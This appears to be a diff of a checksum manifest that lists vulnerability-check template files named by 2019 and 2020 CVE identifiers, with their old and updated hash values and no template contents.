http/cves/2019/CVE-2019-7238.yaml:ad15c947499371ca496d205ea7aa317145445434 -http/cves/2019/CVE-2019-7254.yaml:f54ed8ac0f307b76c04dc0a836616e151bfc668f -http/cves/2019/CVE-2019-7255.yaml:2b42fa187308929290ecc7b5f3643133f65f44d1 +http/cves/2019/CVE-2019-7254.yaml:95d1d890b26cb17d9a8ca18bc87fe77727d4666b +http/cves/2019/CVE-2019-7255.yaml:e2d0abd66f8ddf772c32f386f74a0cf1b2f92de3 http/cves/2019/CVE-2019-7256.yaml:fde61450cf738b1ce83a8f2affd8df4cdf0688e6 -http/cves/2019/CVE-2019-7275.yaml:a69c479f009626f94b0404ee7aba279802aa4071 -http/cves/2019/CVE-2019-7315.yaml:707d8ff9c23cb23a42a172db467b0847eb1034de -http/cves/2019/CVE-2019-7481.yaml:aa93e3c23627d8ede939592aa850b33d64738c98 -http/cves/2019/CVE-2019-7543.yaml:1095bba9bd8f4e75d4d16b5904d453210d308dd5 -http/cves/2019/CVE-2019-7609.yaml:3086c60ba0968faa2d1f1dcb497c96b8427d447b -http/cves/2019/CVE-2019-8086.yaml:0992841a6d46c6e85eaf225cb6e375a4e30bf350 -http/cves/2019/CVE-2019-8390.yaml:57e0d370045eca9ab41ba12877b4f5b63437f19d -http/cves/2019/CVE-2019-8442.yaml:191b54810689fde318f54559df47e5fd1d9ea0e7 -http/cves/2019/CVE-2019-8446.yaml:456086bc323e363a7cb3d91a1ead9dbd1ce28b13 +http/cves/2019/CVE-2019-7275.yaml:a14ee33556e7aabc3949248f4c1fd6114fb25522 +http/cves/2019/CVE-2019-7315.yaml:6bdd1fac8227d75364e8c4e7f70ed6fa903efab2 +http/cves/2019/CVE-2019-7481.yaml:36ea43fe94e72f6b3ad473a55f13f3300246af9e +http/cves/2019/CVE-2019-7543.yaml:91e526ea24842cff1e3c348285b5ecc1d12408e9 +http/cves/2019/CVE-2019-7609.yaml:999f20695f90dbbde91cd338d27f18196c9e578f +http/cves/2019/CVE-2019-8086.yaml:49886f614bda60923d85821b684ed62c14c7a33f +http/cves/2019/CVE-2019-8390.yaml:81200759021a43baeb5bfbbbf490ba70f43d31a1 +http/cves/2019/CVE-2019-8442.yaml:5fbde7271ecb874e8069c92eb1f607360d1cec7a +http/cves/2019/CVE-2019-8446.yaml:d1616f4c33a8cabb113dcceea27258357655037f http/cves/2019/CVE-2019-8449.yaml:bad335eca914e557eaa8fcbfb8b9dde128ce79a4 -http/cves/2019/CVE-2019-8451.yaml:22b33a04899ee1855f6f906f3e6d03cc1a729a88 -http/cves/2019/CVE-2019-8903.yaml:10d4ac0db91d7ed8701d4734180e71122f6b5f73 -http/cves/2019/CVE-2019-8937.yaml:0b60be4b23da5c836001c2392011e8cb8a80a178 -http/cves/2019/CVE-2019-8982.yaml:e8e7cf9c2862fca81fd40c29ce7d8565105f19d3 -http/cves/2019/CVE-2019-9041.yaml:74ab6e10c424791a3fec3f2ed0c4b1a52f5b83cd -http/cves/2019/CVE-2019-9618.yaml:5318532bf849fd962156aa8c4c16ba18005e3ec1 -http/cves/2019/CVE-2019-9670.yaml:c1bd368ac67622a338279052d2830f59d6311346 -http/cves/2019/CVE-2019-9726.yaml:a69baa9ce4c8618cb9d6fa14ea5286bdc586c06e -http/cves/2019/CVE-2019-9733.yaml:768b07b637f398bac6e0c15c5f9e5055f7036ab7 -http/cves/2019/CVE-2019-9915.yaml:f8c83c72885a65d0d2ff14f1c970e48f54763503 -http/cves/2019/CVE-2019-9922.yaml:53b85293a2dcfee6f03e930791f28cef9900f32b -http/cves/2019/CVE-2019-9955.yaml:6272c4ed6a4c65fcbb2e495fb063deb74e50c15e +http/cves/2019/CVE-2019-8451.yaml:a1569835247de05b6f5413f0d4a58721b4e41bc1 +http/cves/2019/CVE-2019-8903.yaml:3bcbb78a1fe68de5ca428e4908836a1747f27814 +http/cves/2019/CVE-2019-8937.yaml:cd2594d2e801d8625b13a8ebd8e81c2ad6163928 +http/cves/2019/CVE-2019-8982.yaml:0c95c969a76fa45b587e091177d554b850506b64 +http/cves/2019/CVE-2019-9041.yaml:b953eee7c311f6143ee515d154fc0c95a55b576b +http/cves/2019/CVE-2019-9618.yaml:1e2cf99488f9265259c0529fa46c95db6361adce +http/cves/2019/CVE-2019-9670.yaml:daaa408b1ebe2ff4b93315931658a46708d67b87 +http/cves/2019/CVE-2019-9726.yaml:0b5bf9f9c8b084175c3f21ae822a433c709c1e3d +http/cves/2019/CVE-2019-9733.yaml:756681f6d0f760d962c45d7e83d5ad90320c3ea8 +http/cves/2019/CVE-2019-9915.yaml:19f721f1626490aa8dbbeb0939089c87bb659dbe +http/cves/2019/CVE-2019-9922.yaml:390920a6c440ebeb3f4f50c9b9fe8fd71412faf3 +http/cves/2019/CVE-2019-9955.yaml:1fd9b230e99c5aba65b4e7c9f30f2a2a9b736d31 http/cves/2019/CVE-2019-9978.yaml:4636b21c013b0297100f78c481f62560e3099704 http/cves/2020/CVE-2020-0618.yaml:fbf1ab8f0e05342580a755ddaaee341e753870d1 -http/cves/2020/CVE-2020-10148.yaml:c07bc9c6fef23c5db1679f7bbb2b5ba898c8d3c8 +http/cves/2020/CVE-2020-10148.yaml:a2e87967ab4e11322e50d4e22df60c7aac3a5a38 http/cves/2020/CVE-2020-10199.yaml:cab4a6f774f992f0f0fa86b0308061dc5cbaa027 -http/cves/2020/CVE-2020-10220.yaml:3e46c760a4b214b3f29137f8e9034d7c1cec7ef1 -http/cves/2020/CVE-2020-10546.yaml:b06b140d2888e908e1c2ebe5c011337b37b03787 -http/cves/2020/CVE-2020-10547.yaml:7722fa5c685b376d61932074928b11e2aec9ea54 -http/cves/2020/CVE-2020-10548.yaml:1143e7e325658e65479c2e57a9615c26430fe904 -http/cves/2020/CVE-2020-10549.yaml:4342f04e324ae025abbd12cbe8a3237196e91ac2 -http/cves/2020/CVE-2020-10770.yaml:c024c7fb5285656ade9dcdc2af2197fdc7fa26c6 -http/cves/2020/CVE-2020-10973.yaml:a6959d34df42057e62736e205ce45187c32ce7b4 -http/cves/2020/CVE-2020-11034.yaml:9ceed4765cec6820469cbaf094c88ff4b68f0e0a -http/cves/2020/CVE-2020-11110.yaml:c786a3d85f4adc47cd8e426e24053bb321da04e3 -http/cves/2020/CVE-2020-11450.yaml:406a810cc4df9140adaa57021528db8e30885d73 -http/cves/2020/CVE-2020-11455.yaml:9acc2d121b03c19171c8c2f6f65d50d855541491 -http/cves/2020/CVE-2020-11529.yaml:6c175b66817b0554921fc4a3848c15774cbf2452 +http/cves/2020/CVE-2020-10220.yaml:5c8e3cbe772694f5c76e87c54a5606beb330c580 +http/cves/2020/CVE-2020-10546.yaml:915c9bc1617e0d71c685e4816754f54e8d9b286d +http/cves/2020/CVE-2020-10547.yaml:d9643af9550cb97307bd3e47af31454813f1c471 +http/cves/2020/CVE-2020-10548.yaml:df3ab85bbe44b70cb0eef76a480ea4b817d0425b +http/cves/2020/CVE-2020-10549.yaml:8c7d8e2e7d912242f6bb1adcc356309bb33d9a3f +http/cves/2020/CVE-2020-10770.yaml:f04a781fa44a5218cd5b477f81af5539851117ec +http/cves/2020/CVE-2020-10973.yaml:0a47a8c156b8469fef3e54370b07538aa9760bc2 +http/cves/2020/CVE-2020-11034.yaml:202800ed9d062212147c69ac7d5b9b7c83f7fcbf +http/cves/2020/CVE-2020-11110.yaml:953e9a4b77c04ff409a5a35bff341d8dadf701ee +http/cves/2020/CVE-2020-11450.yaml:b1c0fdf9fb96c1cab2ca634f2c7ca1929e55e2f1 +http/cves/2020/CVE-2020-11455.yaml:4f30f4e5a7453ad94c2c457566b0bddc56233736 +http/cves/2020/CVE-2020-11529.yaml:27de1dd84dc9bac583d31394a75c35bc64081369 http/cves/2020/CVE-2020-11530.yaml:3e081716b55ce360a7dea277ff5b290776ed3386 http/cves/2020/CVE-2020-11546.yaml:4bc193d77b149f2240c47236d310b2de270f9ee5 -http/cves/2020/CVE-2020-11547.yaml:8a8cb6a112f0238f49b7fdc54afbb6c4ed0aa8ca -http/cves/2020/CVE-2020-11710.yaml:f9898d25d09d98db3e0fbebf0b1551877acef639 +http/cves/2020/CVE-2020-11547.yaml:6de215dcf6b211224c6d3d158e1ef9dcdcfa2b49 +http/cves/2020/CVE-2020-11710.yaml:5ff46f353fe3bb7894296da4a58b1e724246b81e http/cves/2020/CVE-2020-11738.yaml:27a4badfb166de68c5b6a3973b091a452deb4f6f http/cves/2020/CVE-2020-11798.yaml:37e74db60b97fbc8ef1b828cae796e43e79add5c -http/cves/2020/CVE-2020-11853.yaml:86c7d7b7012ad422117947b39fd609b613627268 +http/cves/2020/CVE-2020-11853.yaml:98ab71a2cc4aca0b322e940afed43ec56422470d http/cves/2020/CVE-2020-11854.yaml:adbe91e241775b66562985b2b108475914fa3cd2 -http/cves/2020/CVE-2020-11930.yaml:43f16fb3a9916202791435ad7b9d5ad3e03c6dbb +http/cves/2020/CVE-2020-11930.yaml:066ec7d5760c19a3a2e4d32e73d9abbfafeb1f20 http/cves/2020/CVE-2020-11978.yaml:c14ca155c1a225b586f1392ebc4c0e1d819a6888 -http/cves/2020/CVE-2020-11991.yaml:86fcaa07f2e0967fb7c00558b5d70af4c04a49e0 -http/cves/2020/CVE-2020-12054.yaml:51b1c322d12f49c96fa18399a72acdc08221ffa1 +http/cves/2020/CVE-2020-11991.yaml:1042090eea07411f2d0086d9d420ff20d2a4d9e8 +http/cves/2020/CVE-2020-12054.yaml:18b058da82e52b6f5dfbcad09e5bb41132e0ba85 http/cves/2020/CVE-2020-12116.yaml:e6a010ec3f638a8e0176f17e2954169534d238ef -http/cves/2020/CVE-2020-12127.yaml:9e25e3eba3ee776506c852ae66492241b8215299 -http/cves/2020/CVE-2020-12256.yaml:f1d6da2705293426784489d6aa38a55a824d1ed9 -http/cves/2020/CVE-2020-12259.yaml:3394841e598f5f07ae24e56061c348bb685385ff -http/cves/2020/CVE-2020-12447.yaml:865673003242eee5b829a4077915b5e45ac4cd05 -http/cves/2020/CVE-2020-12478.yaml:55d821bffb72691fddaec77fc63a10eb8919e9b4 +http/cves/2020/CVE-2020-12127.yaml:a7f0816dee1119d842b7fd1148752e0b787686a7 +http/cves/2020/CVE-2020-12256.yaml:205cc4b58718cd39b6618431b71ab7e96b3c5e35 +http/cves/2020/CVE-2020-12259.yaml:7d86d4010244aee3931979fc0b4114231a57cdb5 +http/cves/2020/CVE-2020-12447.yaml:2bdbfcbe81e938995b377df56c2b5bd6fe800718 +http/cves/2020/CVE-2020-12478.yaml:0a5ead6a573905a748265e97485ece1c9bb5e533 http/cves/2020/CVE-2020-12720.yaml:1fa4e8ef501f6eb49a5f09958b2b1e8b23f9484e -http/cves/2020/CVE-2020-12800.yaml:251cf94c5ea84c066109030fac81079d3f9aa361 -http/cves/2020/CVE-2020-13117.yaml:17bf9905e8db256781cd22f7b962b5462b03408e -http/cves/2020/CVE-2020-13121.yaml:68dfa9224c18efd8ab1d7dc358604a4c4fa34d11 -http/cves/2020/CVE-2020-13158.yaml:18c7d6177c9d499babe2c354d18867b5c6aa0ea6 +http/cves/2020/CVE-2020-12800.yaml:fcfa17d6ed5831b96fe555a087883254502aee7c +http/cves/2020/CVE-2020-13117.yaml:64572f7c6fa7054b4038454fafbf850361ed4194 +http/cves/2020/CVE-2020-13121.yaml:e98909e8ba0570c6cdc5cb3cfcc40c7c893dffb7 +http/cves/2020/CVE-2020-13158.yaml:93f97baf2cdc52f26c0fa0df6387fad4fe5860a9 http/cves/2020/CVE-2020-13167.yaml:83148b2047628f44f4ca6bb170d8bee2ee62b656 -http/cves/2020/CVE-2020-13258.yaml:79975d6929c7896af851f4b2c87bd1d9dff41fcf +http/cves/2020/CVE-2020-13258.yaml:4bfeaf355ce1306123711655206c7fd599d2e65a http/cves/2020/CVE-2020-13379.yaml:8c920e86ff6f9c9b98a8206edbbadbe894063e3d -http/cves/2020/CVE-2020-13405.yaml:9d7ad4293b6d52c2a363033e47f76c9853c6b244 -http/cves/2020/CVE-2020-13483.yaml:99f871b873f4145bc3ae87bd21e5f8ce11f578d8 +http/cves/2020/CVE-2020-13405.yaml:01b3040c7eccf5ea5e2735ca828d11668413197a +http/cves/2020/CVE-2020-13483.yaml:fd8ecaef5f023dc5cc8d0121b342861bdcce6a04 http/cves/2020/CVE-2020-13638.yaml:30f7a238e007072e2ae80ccf3a61582da49c8276 -http/cves/2020/CVE-2020-13700.yaml:758cabd69e88a375fde923d07dfaa437cbc48a68 -http/cves/2020/CVE-2020-13820.yaml:fc00f824a23a2f9ae2e0e170d5bd35a4ec135c38 +http/cves/2020/CVE-2020-13700.yaml:ec377dbdfed2d3f7f606767a274cda9e86f44d23 +http/cves/2020/CVE-2020-13820.yaml:34d0006a00af95b1f945a32e0cf8f70cdd8f8779 http/cves/2020/CVE-2020-13851.yaml:7fbd7d51a6742c302e85ea9bf7a804de4baa550a http/cves/2020/CVE-2020-13927.yaml:76d7e51444e202934029cff95bd24431fbb3466c http/cves/2020/CVE-2020-13937.yaml:c21f845e476b8da227f63efe768fddff25c952d3 http/cves/2020/CVE-2020-13942.yaml:31671ad41d5e7af6fe2eaa1611002c57df05ccbd -http/cves/2020/CVE-2020-13945.yaml:ce56432185f799b7762e4662ffb82dd54bacade4 -http/cves/2020/CVE-2020-14092.yaml:f82ee1a16dc2e63e3111e4e54d8d32ce5d0be7ea +http/cves/2020/CVE-2020-13945.yaml:fcdf89601cac94759dda83c580631f188862a797 +http/cves/2020/CVE-2020-14092.yaml:62b676ff923088e74af97193ec5ad297518fd22f http/cves/2020/CVE-2020-14144.yaml:378f308ecda3506d4c41867ea14b1fa3ef419c68 -http/cves/2020/CVE-2020-14179.yaml:1db3a541fcfa8ef148c09c2ffa0b5599e2810282 -http/cves/2020/CVE-2020-14181.yaml:30075b1faa97a8fbff6c692a40b11496f00658e4 -http/cves/2020/CVE-2020-14408.yaml:9c9f0d75a4fd4ea5b2ea13dc335d8eff634da7f2 -http/cves/2020/CVE-2020-14413.yaml:6cd21fc75cf154751f80461723ad15d7ae6e17ce +http/cves/2020/CVE-2020-14179.yaml:61025096cdd1f2fa1fe1c8cc1c1acbc718bb2308 +http/cves/2020/CVE-2020-14181.yaml:52a07fb7cb10d09afdde2439226b6fafbb4d8fc3 +http/cves/2020/CVE-2020-14408.yaml:925503fc4411a6544c1cc880ec35d3b8c3024306 +http/cves/2020/CVE-2020-14413.yaml:4267dc7f009749ee21783176fac004969edd43f2 http/cves/2020/CVE-2020-14750.yaml:416ad3daa80469c8c0f84539d9bfe9a2e649fcab -http/cves/2020/CVE-2020-14864.yaml:6c3c2442ca025696e37c1c1f9e44cb1550aa676e +http/cves/2020/CVE-2020-14864.yaml:461445ab9ed56f8ab5a1ae7796308a055f14740f http/cves/2020/CVE-2020-14882.yaml:75bbfc11c2928d9fbad52a4302f67eb912435b4d http/cves/2020/CVE-2020-14883.yaml:2e592cb3a275a8bff81f51f11bfaae88fc18e0eb -http/cves/2020/CVE-2020-15050.yaml:04b9e3fbd2a1e95fb18b52ee059eea4a6048e174 -http/cves/2020/CVE-2020-15129.yaml:94e031ee3f7182550e6da6308f2a98c878423a32 -http/cves/2020/CVE-2020-15148.yaml:023633421aed33d8490d10bd9f4e24fb7505932c -http/cves/2020/CVE-2020-15227.yaml:92c68423e8999de0b851414ef4a473f3fe6b74eb -http/cves/2020/CVE-2020-15500.yaml:d6e281d37fe3269cfb820e20884e8757552c89bb +http/cves/2020/CVE-2020-15050.yaml:e95701569a6fd49bc0d80a47ac1f91da9c460b09 +http/cves/2020/CVE-2020-15129.yaml:1996832520db2cdce09e22758a51f64e7812cd17 +http/cves/2020/CVE-2020-15148.yaml:d745f1a255443706bce246e16842659297b7fad5 +http/cves/2020/CVE-2020-15227.yaml:8479882983f5933b116ab05d31f87d277957fb49 +http/cves/2020/CVE-2020-15500.yaml:de50fb42afb18beb38a03b2958997be5995624c8 http/cves/2020/CVE-2020-15505.yaml:43f4b56268ae3c18bcf1dba9eef555e3d0edf58e -http/cves/2020/CVE-2020-15568.yaml:42fc05261b6d7cdad39721f1ed3a8ef98c4703fc +http/cves/2020/CVE-2020-15568.yaml:118c7ecd5c29903b35f008a8ce8e97ba6f26b474 http/cves/2020/CVE-2020-15867.yaml:f07def337d87f88acf39971d83c01792e695a835 -http/cves/2020/CVE-2020-15895.yaml:a0f06ab75a14c0930dc24d0ded415ed8d27b6e8b +http/cves/2020/CVE-2020-15895.yaml:a98a5c022834635977846cb0ea6e5d8ffe9d6601 http/cves/2020/CVE-2020-15920.yaml:46aaa5d519f4feb32bb872443fdb9ad2f19bf597 -http/cves/2020/CVE-2020-16139.yaml:793b5cdc09522f0875e959ac821cf1b8fdd51b1e +http/cves/2020/CVE-2020-16139.yaml:81c883eabbe83cf20fc5650a0de16650c7db16dc http/cves/2020/CVE-2020-16846.yaml:c5e01368bfc4f7d5a60555e3f2aa58d64968a5a5 http/cves/2020/CVE-2020-16952.yaml:6eb5154f949597c0352c707b7a794d73ad0a5235 -http/cves/2020/CVE-2020-17362.yaml:cd3760a184900d8a56187631d91e222577b1f08e -http/cves/2020/CVE-2020-17453.yaml:a37359440d159b82a9dd363ce9f001298a3d8976 +http/cves/2020/CVE-2020-17362.yaml:c89a6de0cd26e6eb208f669e3adc55350c677b91 +http/cves/2020/CVE-2020-17453.yaml:323627ee92e02413cbbfd8a796792451db459f73 http/cves/2020/CVE-2020-17456.yaml:5f8badb7699b01a34fd613a1feddb3cdf1169d30 http/cves/2020/CVE-2020-17463.yaml:fab4f4c6ba798a0b1cdc5ad822eefb333bf35750 http/cves/2020/CVE-2020-17496.yaml:dc34c9df5ec51a26289c176e26be035dc37b6a40 http/cves/2020/CVE-2020-17505.yaml:4cbbb25d900e97e6eaa4a6f79b6abbdd908176dd -http/cves/2020/CVE-2020-17506.yaml:4eb8aa00dbc024752979677f4462b8b613bdefab +http/cves/2020/CVE-2020-17506.yaml:fdb1a7a7ed1fe8934553151a19959da152c6b5c8 http/cves/2020/CVE-2020-17518.yaml:a6401dd7e42fe3b25429b76591d98fa1996518cf http/cves/2020/CVE-2020-17519.yaml:eb9e42177c246d5bb22cd1ac797112c75a61ab64 http/cves/2020/CVE-2020-17526.yaml:a8e61b18a34a04c0e5e79e34eddf53ad711a028f http/cves/2020/CVE-2020-17530.yaml:d3130c9e68e50305153b46a5bb50cc2dfca57d5b -http/cves/2020/CVE-2020-18268.yaml:aa4ef6edef24b176d0e67f9829c1fc2f3084b9f7 -http/cves/2020/CVE-2020-19282.yaml:d013ff0572607a7b6d6cd1a80810929bdbf19553 -http/cves/2020/CVE-2020-19283.yaml:18f80eeda4147277a243c18c2e6f7424eb7a1797 -http/cves/2020/CVE-2020-19295.yaml:b8a1839c8e52b09dc6780ddc3a2b328c264320c1 -http/cves/2020/CVE-2020-19360.yaml:e43b62864acb25813434338b25281a983ceea68f +http/cves/2020/CVE-2020-18268.yaml:941ea763f8593a8dc2066e36b2a028ac0142f3d4 +http/cves/2020/CVE-2020-19282.yaml:7d292cb561bd40db5a205d40cd9d6d419bbb5b76 +http/cves/2020/CVE-2020-19283.yaml:d102c49bef88f08889550797d05fcb22ae4fd171 +http/cves/2020/CVE-2020-19295.yaml:a14b9ead9a12d6edf01cf2d9bd544217358bcb5b +http/cves/2020/CVE-2020-19360.yaml:e7f3ffd981467c1863814367c96d422e794870c5 http/cves/2020/CVE-2020-1943.yaml:063f34f2fd1c8eb5ec52b5c48945c5bb8e5e5ede -http/cves/2020/CVE-2020-19515.yaml:e7a70a855995973b9311515f53c1cf6c88c223da +http/cves/2020/CVE-2020-19515.yaml:84ca9da5f7e20f77c47633b2d86544c7e9df619c http/cves/2020/CVE-2020-1956.yaml:55ade0f804fd271a3ba8cceca48dbb8e8b59fa86 http/cves/2020/CVE-2020-19625.yaml:c7c76e0cad9d6d16290ceff419b9e07ecae642cb -http/cves/2020/CVE-2020-20285.yaml:87dde7ac0f5b4a745a72bd63dc1c99cad144fb4b -http/cves/2020/CVE-2020-20300.yaml:51ab351a0ffc7975da645fac921adbe109d3cf78 -http/cves/2020/CVE-2020-2036.yaml:2e351ee23edd9004e9a34a5d3bbff5b889db43bb +http/cves/2020/CVE-2020-20285.yaml:4d79038f2aab6d64708fc3029bba241ddcfc057f +http/cves/2020/CVE-2020-20300.yaml:da0b39e3885aaf99a2b1872443f2dcb53e863ac1 +http/cves/2020/CVE-2020-2036.yaml:827c3072cbc0a867467534a6356db110dcf9b3b0 http/cves/2020/CVE-2020-2096.yaml:85ee827bb9417eba755d6d75bab7dce44d9ab729 -http/cves/2020/CVE-2020-20982.yaml:a755390845ac98034447d58dc77e73363aa21479 -http/cves/2020/CVE-2020-20988.yaml:98c479ae576e63c18d3d7da80446bb504ffb330d -http/cves/2020/CVE-2020-21012.yaml:0893df28c8c7f98aeb19505abcd024ecb66f9f48 -http/cves/2020/CVE-2020-2103.yaml:0d935a4706ee57cadbb63ff20e64e5ad11d881f9 -http/cves/2020/CVE-2020-21224.yaml:58a1143524dee71a6246b631e9b81418551dd224 -http/cves/2020/CVE-2020-2140.yaml:a590bf24cc50792984a9bd068421d408193896bb -http/cves/2020/CVE-2020-22208.yaml:736285ca8b432942bbedbbad11e75375a9413de1 -http/cves/2020/CVE-2020-22209.yaml:9c255d102672589a55f88eb17c76ce677a8361f7 -http/cves/2020/CVE-2020-22210.yaml:3247d5987ca5cf2b21fe8f4c496459060cfb0f79 -http/cves/2020/CVE-2020-22211.yaml:e57a822783db33e4cb18c34050d06a8814882013 -http/cves/2020/CVE-2020-22840.yaml:e96216247177750cc179be9b6adf41771f64b54c -http/cves/2020/CVE-2020-23015.yaml:e291d521c622ad9fc8ad6e0cd9e83e6fbff24c47 -http/cves/2020/CVE-2020-23517.yaml:7716749ddc018ad648aa1b0f6b2b9d3a8213818b -http/cves/2020/CVE-2020-23575.yaml:6c42dc248e5008d27a668cd8e7bbb796b56aa561 -http/cves/2020/CVE-2020-23697.yaml:d5fa5113e46a16af10057b49364f0688896232ed -http/cves/2020/CVE-2020-23972.yaml:24484dc0fb7c52bdff107af463619e2a3283908f -http/cves/2020/CVE-2020-24148.yaml:4fa2e899f42057bc1cfa94f1bbf1abd5515f0e9e +http/cves/2020/CVE-2020-20982.yaml:3b691949cbcc6ea7f8954ca0100636cd44bf668c +http/cves/2020/CVE-2020-20988.yaml:268eccacf8041850759bced744c8eaac9c04f6fd +http/cves/2020/CVE-2020-21012.yaml:3425bc3004fdfbc908e85a4acdd13e6e9538ba8e +http/cves/2020/CVE-2020-2103.yaml:81335e8d594bc5a171e1e7a7d26852569d1fe9bd +http/cves/2020/CVE-2020-21224.yaml:c9f38f473193a37b57b93c0fb5bdc9c53d5d4c5d +http/cves/2020/CVE-2020-2140.yaml:93e6ec9d9726d13a13ba25b5670635adf1bc5ae6 +http/cves/2020/CVE-2020-22208.yaml:efd1199296f6aae65f04644d4680ef572df91141 +http/cves/2020/CVE-2020-22209.yaml:37de18d991501099356cb34ce56466b2187139b7 +http/cves/2020/CVE-2020-22210.yaml:442ea700d131db2eb52ba91665f35d553bf5b610 +http/cves/2020/CVE-2020-22211.yaml:60e91c7213a5ed1ca2c532065f4f5ea45b27591d +http/cves/2020/CVE-2020-22840.yaml:2c0f5be08eb6a9e3efeb23deab3f16b1db4aa93c +http/cves/2020/CVE-2020-23015.yaml:e60a8b7a046407263b1f056cdc6872a485aae312 +http/cves/2020/CVE-2020-23517.yaml:3c7da95952a998335e4d0f1aa2954a6922698f58 +http/cves/2020/CVE-2020-23575.yaml:2f04c68ac3a6310afb467e4674cc7348a3a49263 +http/cves/2020/CVE-2020-23697.yaml:83c6da370d019f769464252da6126515e226eaf0 +http/cves/2020/CVE-2020-23972.yaml:29f22b08ef1eb73d33b7ded7e0e3751bafa5a074 +http/cves/2020/CVE-2020-24148.yaml:b2b53fe26fef55b440dffe68f645e94857a9bdff http/cves/2020/CVE-2020-24186.yaml:8bc198a56e0fe2c7a824ad75218b7d42417d5a76 -http/cves/2020/CVE-2020-24223.yaml:100e40ec66d13ffb868f346e75ee48571d4272e9 -http/cves/2020/CVE-2020-24312.yaml:4106ab674695eaff828715736c5abfd5e010e869 +http/cves/2020/CVE-2020-24223.yaml:d2ffb4e265462decd1fe9f19a153679ca925d4c5 +http/cves/2020/CVE-2020-24312.yaml:2344731304ca26ec1e0a3632c39e25f27103ed85 http/cves/2020/CVE-2020-24391.yaml:cbe67d2c14cc3f245a9a16ef9a275687c468a33b -http/cves/2020/CVE-2020-24550.yaml:70120614a63884dc0c42f858de09c0b339950a7b -http/cves/2020/CVE-2020-24571.yaml:b0144c435eecb660f6b68f2a50257cedd44ec860 -http/cves/2020/CVE-2020-24579.yaml:23e26299f9fb09bf51a25453754408a038835f9e +http/cves/2020/CVE-2020-24550.yaml:f5c51e0a81d5c1ed70afb42df4f8eab494904e78 +http/cves/2020/CVE-2020-24571.yaml:ab126860f43bd90eb7ce5d67c1c54bfd4c25cc18 +http/cves/2020/CVE-2020-24579.yaml:31850bd2ba6c88a0104261f02707acbd7b7ab6ae http/cves/2020/CVE-2020-24589.yaml:21921f6a633e8bd1066ea412b3ba51c1223a7c5a -http/cves/2020/CVE-2020-24902.yaml:b29307247786f457e31e7e63d59513e9856b1c2a -http/cves/2020/CVE-2020-24903.yaml:7d42391533a1462eee50571df5940679cc3d31cf -http/cves/2020/CVE-2020-24912.yaml:c7d59c0a68d5900a5c5e424e3aa0417d8cca9dab -http/cves/2020/CVE-2020-24949.yaml:1d042cfe28dac499f456d2d3f5ad27c1b8e2bd5f +http/cves/2020/CVE-2020-24902.yaml:672d6d4cfd229abfa71f10def4555a3fac25bcdd +http/cves/2020/CVE-2020-24903.yaml:9b1e8f75f9e656b601c935f07451c26f4a48116a +http/cves/2020/CVE-2020-24912.yaml:d76b3508a968640f989689375939fba1395b4693 +http/cves/2020/CVE-2020-24949.yaml:d8f83e7e2a3f63352606d24f4725eae728eadeb5 http/cves/2020/CVE-2020-25078.yaml:051a143ef888be4f70673add984c533aa537f323 http/cves/2020/CVE-2020-25213.yaml:623630ef643f5dc11dc67bd7ba62c9642cc89a5f http/cves/2020/CVE-2020-25223.yaml:e3e3331af49a52607d898d17ccccffba106870b4 -http/cves/2020/CVE-2020-25495.yaml:95e7007dd628358c41f5b728cf0b77de4adb3300 +http/cves/2020/CVE-2020-25495.yaml:9237cbbf44c80b74ad3075957eab2974e2c1a9cd http/cves/2020/CVE-2020-25506.yaml:3e1310a17def35b5ff214f92fd72861159339080 http/cves/2020/CVE-2020-2551.yaml:c810a2e2d026f58b1982ce0506a2982214fb5247 http/cves/2020/CVE-2020-25540.yaml:a032ceb042740d358c0de3cf3c62c5c232334af9 -http/cves/2020/CVE-2020-25780.yaml:a990944c257aa17c12224dcfe8614c1c3f8be4e1 -http/cves/2020/CVE-2020-25864.yaml:cd28ec0285e637ec1110ea2d846671d96031bfff +http/cves/2020/CVE-2020-25780.yaml:4d469a01fc6e8472ce19bde3ac19157b7fcffcd9 +http/cves/2020/CVE-2020-25864.yaml:4047883752778e3b0b1d2f55f70afd14186112a4 http/cves/2020/CVE-2020-26073.yaml:c2480acfdbe2cb79eb9677736948078368b67f54 -http/cves/2020/CVE-2020-26153.yaml:39a4a7bf191fa411be8982bb26dc8fc6dd0ef00d -http/cves/2020/CVE-2020-26214.yaml:c460cfcad8536fd82925ec68ddb1480788522470 +http/cves/2020/CVE-2020-26153.yaml:075c953a533cb4cdf25aaf6dba4632503a84344a +http/cves/2020/CVE-2020-26214.yaml:6487ec204468fe7520e901208c4e048c9948d500 http/cves/2020/CVE-2020-26217.yaml:bfc01bf7d9a86f439c6f00153d209c145bcf864d -http/cves/2020/CVE-2020-26248.yaml:e79a52347391656f32921c40600c61a478e05c5b +http/cves/2020/CVE-2020-26248.yaml:2f661ab674238a5d09f84631038d9c0bd69bccf4 http/cves/2020/CVE-2020-26258.yaml:08b3643b296603e503842a401a9731077eb67d17 http/cves/2020/CVE-2020-26413.yaml:e02cc3ab518d2ce930b9f83c9284ecf050dfbded -http/cves/2020/CVE-2020-26876.yaml:5ef42da9cf4ae5ff1f4287b622dc7ec781efae56 -http/cves/2020/CVE-2020-26919.yaml:0a6e524457b9140d3255d79c9b1f0851483c7e33 -http/cves/2020/CVE-2020-26948.yaml:10344247b7983e705cec2799727fc1a196735068 -http/cves/2020/CVE-2020-27191.yaml:22fecca90ac2952c53a77d7b7c8d3e8b681e86a3 -http/cves/2020/CVE-2020-2733.yaml:a2b5d57b9bfbeeaad30e2849848b6d0f0bd8f822 -http/cves/2020/CVE-2020-27361.yaml:6e0566d2df976178dd536288be4ff164e0f53167 -http/cves/2020/CVE-2020-27467.yaml:8b32049bc291319cb97ba91aae73b2b4d6456a78 -http/cves/2020/CVE-2020-27481.yaml:06cb2d8a76b5e5d1592b74f71c21f00ea3d753aa -http/cves/2020/CVE-2020-27735.yaml:6b14b729fb46bed14890a98887722e6fd33d7194 -http/cves/2020/CVE-2020-27866.yaml:eb1344d1be19703d2f1ccc22f5615b8276fb09e5 -http/cves/2020/CVE-2020-27982.yaml:262857207e068a1adcdce834197362e7ede06c52 -http/cves/2020/CVE-2020-27986.yaml:d0b62140d102470cb5f6e370d6c61065174d10b0 -http/cves/2020/CVE-2020-28185.yaml:c44a23582bd1ea4b626882e95081537323e74da6 +http/cves/2020/CVE-2020-26876.yaml:dc722bba694a4f8870198fe3c943536767b77285 +http/cves/2020/CVE-2020-26919.yaml:f0b383ff1596dcd30bcd281639c9926eeba57ad6 +http/cves/2020/CVE-2020-26948.yaml:3a492a1b82af2d9a016c497e979f0305d5c07e35 +http/cves/2020/CVE-2020-27191.yaml:db0454d721de1f2db138a70be103a1193ca270d3 